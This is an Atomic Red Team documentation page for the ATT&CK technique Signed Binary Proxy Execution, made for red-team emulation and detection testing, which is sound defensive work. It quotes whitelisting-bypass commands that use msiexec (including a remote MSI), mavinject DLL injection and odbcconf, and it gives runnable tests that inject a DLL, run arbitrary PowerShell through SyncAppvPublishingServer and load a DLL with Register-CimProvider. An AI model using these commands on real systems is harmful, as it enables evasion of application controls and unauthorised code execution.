security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1218/T1218.md
T
CircleCI Atomic Red Team doc generator 499c751bcc Generate docs from job=validate_atomics_generate_docs branch=master
2019-09-03 13:36:10 +00:00

101 lines
4.5 KiB
Markdown
Raw Blame History

# T1218 - Signed Binary Proxy Execution
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218)
<blockquote>Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
### Msiexec.exe
Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
* <code>msiexec.exe /q /i "C:\path\to\file.msi"</code>
* <code>msiexec.exe /q /i http[:]//site[.]com/file.msi</code>
* <code>msiexec.exe /y "C:\path\to\file.dll"</code>
### Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
* <code>"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
* <code>C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
### SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
### Odbcconf.exe
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
* <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>
Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>
## Atomic Tests
- [Atomic Test #1 - mavinject - Inject DLL into running process](#atomic-test-1---mavinject---inject-dll-into-running-process)
- [Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code](#atomic-test-2---syncappvpublishingserver---execute-arbitrary-powershell-code)
- [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll)
<br/>
## Atomic Test #1 - mavinject - Inject DLL into running process
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll|
| process_id | PID of process receiving injection | string | 1000|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
```
<br/>
<br/>
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
#### Run it with `command_prompt`!
```
SyncAppvPublishingServer.exe "n; #{powershell_code}"
```
<br/>
<br/>
## Atomic Test #3 - Register-CimProvider - Execute evil dll
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll|
#### Run it with `command_prompt`!
```
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
```
<br/>
Reference in New Issue View Git Blame Copy Permalink